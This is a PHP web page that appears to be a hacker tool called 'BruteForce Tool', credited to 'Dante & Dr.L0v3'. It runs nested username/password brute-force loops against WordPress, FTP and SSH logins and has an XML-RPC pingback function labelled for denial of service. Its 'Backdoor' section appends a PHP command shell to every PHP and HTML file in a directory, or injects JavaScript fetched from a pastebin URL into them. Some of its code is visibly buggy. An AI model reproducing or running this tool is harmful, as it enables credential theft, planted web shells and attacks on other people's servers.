Untitled

US9876543134IS8888
DGDR8945KLDF88SD


<style type="text/css">
textarea { resize: none; }
</style>
<body text='white' bgcolor='#000000'>
    <title>BruteForce</title>
    <p align='center' dir='ltr'><font face='Gigi' size='6'>*** BruteForce Tool ***</font></p>
    <form method='POST'>
        <center>
            <p dir='ltr'>
                <textarea rows="2" cols="40" name="ip"></textarea><br><br>
                <input type='submit' value='Start !!!' name='start'><br><br/>
                <input  name="myradio"  value="1" type="radio"> Wordpress</div>
                <input  name="myradio"  value="2" type="radio"> FTP</div>
                <input  name="myradio"  value="3" type="radio"> SSH</div>
                <input  name="myradio"  value="4" type="radio"> XMLRPC/DOS</div><br/><br/>
                <p align='center' dir='ltr'><font face='Gigi' size='5'>Backdoor</font></p>
                <input type='text' placeholder="Directory" name='dir'>
                <select name="case">
                    <option value="js">JS Backdoor</option>
                    <option value="php">PHP Backdoor</option>
                </select>
                <input type='submit' value='Upload' name='up'><br/><br/>
                <form method="post"  enctype="multipart/form-data">
                    <input type="file" id="inputfile" name="inputfile">
                    <input type="submit" name="back" value="Click To Upload"><br/><br/>
                </form>
                <div style='float: left; margin-left: 10px;     border: dashed 1pt;  background: black; color: white;'>
                    <textarea cols='40' rows='30' name='username'>Username</textarea></div>
                <div style='float: right; margin-right: 10px;  border: dashed 1pt;     background: black; color: white;'>
                    <textarea cols='40' rows='30' name='password'>Password</textarea></div>
                    <font face='Verdana' size='1'>[-] RESULT [-]</font>
    </form>

<?php

@set_time_limit(0);
$ip = explode("
", $_POST['ip']);
$username = explode("
", $_POST['username']); // Mass
$password = explode("
", $_POST['password']);


function encdir($dir, $code) {
  $files = array_diff(scandir($dir), array('.', '..'));
  foreach ($files as $filemine){
    if(is_dir($dir.'\\'.$filemine)){
      encdir($dir.'\\'.$filemine);
    }else{
      $a = stripos(basename($dir.'/'.$filemine), 'php');
      $b = stripos(basename($dir.'/'.$filemine), 'html');
      if ($a !== false || $b !== false) {
        file_put_contents($dir.'/'.$filemine, $code, FILE_APPEND);
        echo "<dir='ltr'><font face='Tahoma' size='2'><font color='#008000'><br/><br/>".$dir.'/'.$filemine.'<br/></font>';
      }
    }
  }
}

function bruteftp($connect, $ip, $user, $pass) {
    $connect = ftp_connect($ip) or die("Error");
    if (ftp_login($connect, $user, $pass)) {
        echo "<p dir='ltr'><font face='Tahoma' size='2'>Cracked :
        <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
    }
}


function xmlrpc($target, $url, $base){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/xml'));
        curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$target</string></value></param><param><value><string>$base</string></value></param></params></methodCall>");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        $data = curl_exec($ch);
}

$brute = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>";


function bruteword($ip, $user, $pass){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $ip.'/wp-login.php');
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$user&pwd=$pass&wp-submit=Login&redirect_to=$ip/wp-admin/&testcookie=1");
    $exec = curl_exec($curl);
    $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    if($http == 302  && preg_match("//",$result) || eregi('upload.php',$brute)   ) {
        echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
        <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
        break;
    } else {
        echo "<br/><font color='red'>Failed</font><br>";
    }
    curl_close($curl);
}

function brutessh($ip, $user, $pass){
    $ssh = @ssh2_connect($ip, 22);
    $auth = @ssh2_auth_password($ssh, $user, $pass);
    if($auth){
        echo "<br/><p dir='ltr'><font face='Tahoma' size='2'>Cracked :
        <font color='#008000'>$user</font>:<font color='#008000'>$pass</font>@<font color='#008000'>$ip</font></font></p>";
    }
}

if (isset($_POST['start'])) {
    switch ($_POST['myradio']){
        case 1:
        foreach ($ip as $host) {
            foreach ($username as $user) {
                foreach ($password as $pass) {
                    bruteword($host, $user, $pass);
                }
            }
        }
        break;
        case 2:
        foreach ($ip as $host) {
            foreach ($username as $user) {
                foreach ($password as $pass) {
                    bruteftp($connect, $host, $user, $pass);
                }
            }
        }
        break;
        case 3:
        foreach ($ip as $host) {
            foreach ($username as $user) {
                foreach ($password as $pass) {
                    brutessh($ip, $user, $pass);
                }
            }
        }
        break;
        case 4:
        foreach ($ip as $host) {
            foreach ($username as $user) {
                foreach ($password as $pass) {
                    xmlrpc($host, $user, $pass);
                }
            }
        }
        break;
    }
}

if(isset($_POST['back'])){
    if($_POST['case'] == 'js')  {
        $code = file_get_contents('http://pastebin.com/raw/NrjQtBrn');
        encdir($_POST['dir'], $code);
    }elseif($_POST['case'] == 'php') {
        $shell = '<?php system($_GET["com"]); ?>';
        encdir($_POST['dir'], $shell);
    }
}

echo "<p><font face='Verdana' size='1'>
+------------------------------------------------------------------------------------------------------------+</font></p>
<p><font face='Verdana' size='1'>Rec0ded by : <a>Dante & Dr.L0v3</a></font></p>
</form>";

?>